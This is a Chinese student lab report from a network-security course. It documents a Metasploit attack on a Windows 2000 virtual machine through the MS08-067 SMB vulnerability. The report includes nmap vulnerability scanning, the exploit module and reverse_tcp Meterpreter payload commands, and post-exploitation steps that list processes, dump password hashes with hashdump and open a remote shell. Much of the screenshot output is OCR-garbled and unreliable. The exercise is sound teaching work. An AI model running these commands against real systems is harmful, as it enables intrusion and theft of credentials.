缓冲区溢出攻击与防范实验报告

实验六报告课程名称网络安全实验成绩实验名称缓冲区溢出攻击与防范实验学号20姓名郑明毅班级网络工程2班日期2018/6/7实验报告一、实验目的及要求：实验目的通过实验掌握缓冲区溢出的原理；理解缓冲区溢出危险性；理解防范和避免缓冲区溢出攻击的措施。实验要求（1）利用缓冲区溢出工具或者利用一个简单的溢出C程序进行溢出漏洞攻击（2）分析缓冲区溢出攻击原理和危害（3）给出防范和避免缓冲区溢出攻击的措施二、实验过程及要点：实验过程:MS08-067（WindowsServer服务RPC请求缓冲区溢出漏洞）远程缓冲区溢出攻击测试1网络测试环境构建首先需要先配置好一个渗透测试用的网络环境，包括如图1所示的运行win10系统的计算机，

如图2所示的Windows2000系统（虚拟机环境下）的计算机。显然这2台计算机处于同一个网段中，可以相互通讯,win10系统用作攻击机，下面将在此系统上运行Metasploit进行渗透测试，而Windows2000系统都是本次任务中需要进行渗透入侵的靶机，保持安装后的默认状态，没有打额外的系统安全补丁。图1win10攻击机

图2Windows2000靶机2、扫描靶机在正式开始渗透之前，应该对靶机进行扫描探测工作，搞清楚渗透目标的系统类型、开放的端口服务、可能存在的安全漏洞等。在win10攻击机上运行metasploitconsole，即可进入Metasploit环境。现在可以利用MSF框架中集成的Nmap扫描器对渗透测试目标进行扫描，如图3所示，获取了靶机的开放服务和操作系统类型等信息。~jMetasploitProConsoleFileEditViewHelp—X图3windows2000扫描结果利用扫描器的脚步插件，还有可能直接探测出目标系统的安全漏洞，例如如图4所示，Nmap利用smb-check-vulns插件扫描探测出了Windows2000靶机存在MS08_067漏洞，命令执行如下：nmap-script=。namap扫描的结果里报告发现MS08-067：DISABLED。这是在暗示我们或许能够对这台主机进行渗透攻击，然后我们在Metasloit里面找到此漏洞的攻击模块，并尝试攻击目标机器。MS08-067是一个对操作系统版本依赖非常高的漏洞，所以在这里，我们只自动payload指定一下目标就可以确保触发正确的溢出代码。MeiasploitProConsoleFileEditViewHelpmsf>TiiTnap-script=3nib-checlt-vulns.use01*]exec:nmap-sciipt=srab-chect-vulns.rse012018-06-0713:08?DinTTTTTU?(0up}r1undergoingARPPingScanETC:13:08(0:00:00rsnuiningjiStaitingNraap€.47(http://maiiap.ozg}atrrrmsStats:0:03:2018-06-0713:08?DinTTTTTU?(0up}r1undergoingARPPingScanETC:13:08(0:00:00rsnuiningjirnsss_dns:warning:UnabletodetezraineanyDNSsezveis.ReverseDNSisdisabled.Tryusing--systen-dnsorspecifyvalidserverswith--dns-serversStats:0：0□:21elapsed;aHosescorttpleted(1up)r1undergoing5XNStealttScans^NsuealuhscanTiming:At>juc1.00%done;etc：13:0£(0：oo：00remaining}Nnaprepaztfor1S2.1€S.5€.1O1Host±3up(0.000335latency)!BNotshown:99fiPORT135/tcp139/tcp445/tcp1025/tcpSTATE□pen□pen□S^en□penclosedportsSERVICEmisrpa1netbioa-ssnmiciosoft-dsNFS-oi-IISMACAddress:08:00:27:AB:23:F4(CadnnsComputerSystems}Hostscriptr已sults:]snob-check-vnlns:|MSO8-067:CHECEDISABLED(add1-一script-aijs=imsafe=l'torun>|Conficker:LikelyCLEAN(cve-z(J09-3103)i:checeDISABLED(add1-一script-arjs=misare=i1tor|regsvcDoS:CHECK(cve-z(J09-3103)i:checeDISABLED(add1-一script-arjs=misare=i1torCHECEDISABLED(add1--sc-iipt-args^ujisaf■torunCHECEDISABLED(add1--ac-rxpt-are—11torunIMSO7-029:Nnapdone:1IPaddress(1hostup}seamed,in21aseconds图4漏洞扫描结果3利用MS08_067漏洞渗透入侵MS08-067漏洞的全称为“WindowsServer服务RPC请求缓冲区溢出漏洞”，如果用户在受影响

MicrosoftWindows的系统上收到特制的RPC请求，则该漏洞可能允许远程执行代码。在2000WindowsXP和WindowsServer2003系统上，攻击者可能未经身份验证即可利用此漏洞运行任意代码，此漏洞可用于进行蠕虫攻击，目前已经有利用该漏洞的蠕虫病毒。防火墙最佳做法和标准的默认防火墙配置，有助于保护网络资源免受从企业外部发起的攻击，默认情况下能建立空连接。MicrosoftWindows既然已经知道Windows2000靶机存在MS08_067漏洞，下面就在Metasploit环境中利用它进行渗透入侵。首先，输入searchms08-067查找与其相关的漏洞攻击程序，并启用该渗透攻击模块查看基本信息，然后，输入useexploit/Windows/smb/ms08_067_netapi命令表示选择利用这个漏洞，如图5所示。所示。图5选择漏洞如上我们已经驾驭了(ms08_067_netapi)这个漏洞攻击程序，哈哈！接下来我们要找一找metasploit下的有效攻击荷载(payload)，那就使用命令：showpayloads来查找一下吧！然后用set命令选择一旦利用漏洞渗透进去使用什么攻击载荷，这里使用MSF框架里功能强大的Meterpreter攻击模块下的反向连接shell载荷，使用命令：setpayloadwindows/meterpreter/reverse_tcp,执行如图6所示。

所示:||MeissploitPiroConsolec—FileEditViewHelp□X图7需要配置的参数now,现在我们需要设置ip咯，设置命令：setRHOSTsetLHOST配置本地攻击机和远程靶机的IP地址，如图8所示图8配置参数现在呢，我们基本已设置完成，接下来我们show一下看看自己的配置都在不确认一下信息：（看到了吧，我们的配置没问题吧！Ip都有了啊！！！）MeiasploitProConsoleFileEditViewHelpnsfexploit(tlsOB0&7netapi)>showoptionsModuleoptions(explcit/windows/smb/ras0S_067_nstapi}:NameCurrentSettingReijuiredDescripcionRHOSTRPORTSMEFIPE192.1€S.5€.1O1yes445^esBROWSERyesThetargetaddressSettheSMBserviceportthepipenametouse(browser,srvsvc)NameCurreTitSettingRequiredDescriptionEXITFUNCd.pzocessrLHOSTLPORTthread.none)172.IE.7.1914444yesyesyesExittechniciue(Accepted:11rsehrthieaThelistenaddiessThelistenpoztExploittarget:idName0AutomaticTorgetingrtisfexploit(msO8067netapi}>Ready图9检查配置参数所有需要的参数配置好了以后，在进行exploit渗透攻击时，会出现一些状况，有可能渗透不成功，需要在这时候谨慎。用exploit或run命令发动攻击，如图10所示，渗透成功后，设置的回连主机就是Metasploit攻击主机，攻击主机会获得一个meterpreter控制会话session。IMeiasploitProConeole—FileEditViewHelpd▼奸研19勘画耕roisfexploit(ins08_067_netapi}>exploit[*]StartedreverseTCPbandlsron91:4444[*]Automaticallydetectingthetarget..-[*]Fingerprint:Windows2000一ServicePack4withMS05-010+一lang:Chinese一Traditional[*]Selected.Target:Windows2000Universal[*]AttenipEingtotriggertnevuineiat-iliEy.-.[*]Sendingsuage|957-3S7DynesJto172.IS.7.191[*]MeterpretersessiorL1opened(5>1;-1->172.IS.7.1^1:54931}at2018-06-0713:21:29-fOSDCmeterpreter>IReady15kS0图10成功获取session吼吼！！！成功了！！！已成功拿下对方主机，那么现在你要做什么呢好的，告诉你一句话：好戏开锣咯••-是时候让你体验一下当黑客的感觉了！Hello,hacker还等什么呢好吧，废话少说，第一个“破坏”玩起！哈哈！实例1从靶机拿到的ipconfig/all，如图11

@M&tasploitProConsole—XFileEditViewHelpmeberp匚丈匕之匚>ipconfigInterface1Naine:MSTCPLoopbackinterfaceHardwareMAC:00:00:00:00:03:00MTU:1S00IPv4Address:IPv4Netmask:Interface1€777219Name:AMDPCNETFanmlyEthernetAdapterEardwareMAC:OS:00:27:97:af:e2MTU:1500IPv4Addrass:10.0a2a15工Fv4Netmask:255.255.Z55.0Tnszerface33554^36Name:SMDPCNETFamilyEthernetZdapterEardwareMAC:OS：00：27：ai>：23：14MTU:1500工FvlAddress:192.163.5^.101IPv4Netmask:255-255-255.0mecerpreter>\11Ready牛MN图11从靶机拿到的ipconfig/all实例2获得系统当前的进程列表，如图12：

FileEditHdpr>ste-rprietei:>psPx□cessLiaGAPIDPPIDNiairsAxchScssianiUaeiPathQ0[SysGemPzoaeas]fl0SystemaBE0NTAUTKCRIT¥\SYSTEM」5M8anja.ejceslEE。NTAITTECBITYXSYSTEMXSyacanRootXSyJten32\amss.exe17Z15Zcsxsa.exe0NTB.ITTECRITY\SYSTEMX??\C:\BItm\sysreraSZ\csrSB.exe192152winlcuDH.exejl£E0NTAITTEC&IT¥\SYSTEMX??\C:\WIHNIV^yateraS2\wid1octqil.exeZZ-319Zsexvice8u&xe1E60MTJlITTECRITY\SYSTEMCt\WINNT\s5^cEEL32\S€iEVicesufixe23619213fl33.Me崩E0NTAITTEC&IT¥\SYSTEMC:\KINNT\aysc=0132X13a33.exegoszzgsvanasc.egewseqntrittegrzty\systemc:XwinntXavbcEmazXBvcHost.exe4362243POOL5V.EXEaBE0NTAUTECRIT¥\3¥3TEMC:MflINHT\sy3t™32\spDD13v.eace4E日svcncac.esenseqntritthgrzt¥\systemc:\winnt\svbeEjnazXBvcnosT；.exe50D224matask-eKexBE0NTAUTKCRIT¥\SYSTEMC:VWINKTYsyatsmSSXMSTfl.sk.exeS3622winrajmt.eMe3l9E0NTAITTECRIT¥\SYSTEMC:WINNT\Syscan32\WBEM'^intl^t.exe5日A22^svahcsc-exexB60MTB-ETECRTTY\SYSTEMCtXWINNT\s5^cem32XBVCtiO3Luexe?52780eKplaiEr.ex^崩E。COtLEUTER11.Admimstzat□rCs\HINNT\Exz-1orer.EXEEitiD752^aahiDgr.ese恐SEQCOMEUTER\A«aministxat□rc;\winnt\svbgEjn32\taa：nn.gx■es.eS32752TEX^DDRE.EKEacEE0COMEUTER\adniinistratorC:\ErograraFileaXlntecnetEacpIoeer\iex^lDre.exe9后日15二intexnat.eaekseqCOMFUTERXAdniinistzat:□rc;\winntXavbgEJnazsXlncErnat.exe1QD3-584wuau>zIt.txea:BE0COMEUlLR\SidrriinxstTiBtorC:\WINHT\sy5tem32\wTiaLiiclt-eacenb±cerpreDer>|"7Q)11Ready图12windows2000进程列表实例3：获得当前的工作目录和用户id,如图13：||MetasploitProConsole—XFileEditViewHelpmeterpretex>pwd.C:\WINNT\3ystEni3Zmeterpreter>|AVReady&m70图13windows2000的工作目录和用户id实例4：获得目标系统的passwordhash，如图14：国MetasploitProConsole—□XFileEditViewHelpmeterpreter>hashdurapAdministiator:500:aadSti^BStSl^O^eeaadSb^BEbSl^O^ee:31d6cfe0dl6ae931t>73c59d7e0c089c0:::Gaesv;502;aad3L435tj52^<j^eeaad3b435t?51^G^ee;31dSc±eQdlSac531t>73Q5Sd7eGcG35c0:::meterpreter>|Ready7x70图14windows2000的passwordhash实例5：获得目标系统的DOSshell，用了meterpreter的session后，即可用各种命令对远程靶机进行操作，如图15所示。图MetasploitProConsole-—□XFileEditViewHelpmeterpreter>snellPiocess545created.Channel1created.MicrosoftWindowsZOOO[VersionS.00.2195](C)Z□耳ZOZO1935-ZQOOMicrosoft-Corp.C:\WINNT\3ystem3Z■图15获得windows2000的DOSshell实例6：那我就和靶机简单比较一下命令：ipconfig/all吧！！！|~|MetacploitProConizolFFileEditYi油Help——X7,47回知尊费EtherrieT：adapter11n■1J■J2:Ccimectten-speci±icDNSSu±fis-:Description“..・.；AMDECNETFamilyPCIEthernetAdaptcx#2PhysicalAddxess.0£-DO-27-AB-23-F4DHCPEnat-l=d.■..;YesAntoconfignraticnEnabled....:YesrpAcadress.:192.16S.56-101EiibnetMask“・・・・:2S5.25B.35S.0DeraulLGaceway;DHCPSeCTtr“・・・・:1S00DNSServers.-!LeaseObtained“・・・・:201BLESEEI7LI]13;29:28LeaseExp-ires:20ieLn6EC7DD13:49:29C:XWLNMTXsysteiu32?-|Ready17x90从靶机拿到的ipconfig/all，如图17：区C:\WINNT\system32\cmd.exeC:XDocumentsUindows2000Name<C）版股所有1985-2000MicposnftCorp-IPConfigui'ationExplorerHostPviriai'vDNENodeType区C:\WINNT\system32\cmd.exeC:XDocumentsUindows2000Name<C）版股所有1985-2000MicposnftCorp-IPConfigui'ationExplorerPhysicalAddressDHCPEnabled..fiutocanfigurationEnabledIPAddressSubnetMasi;DefaultGatewayDHCPServer

C:\WINnetstaNT\3y33eni32>iiet：5tat-ant-anActiveCormec-tionsProtoLocalAddiessForeignAddres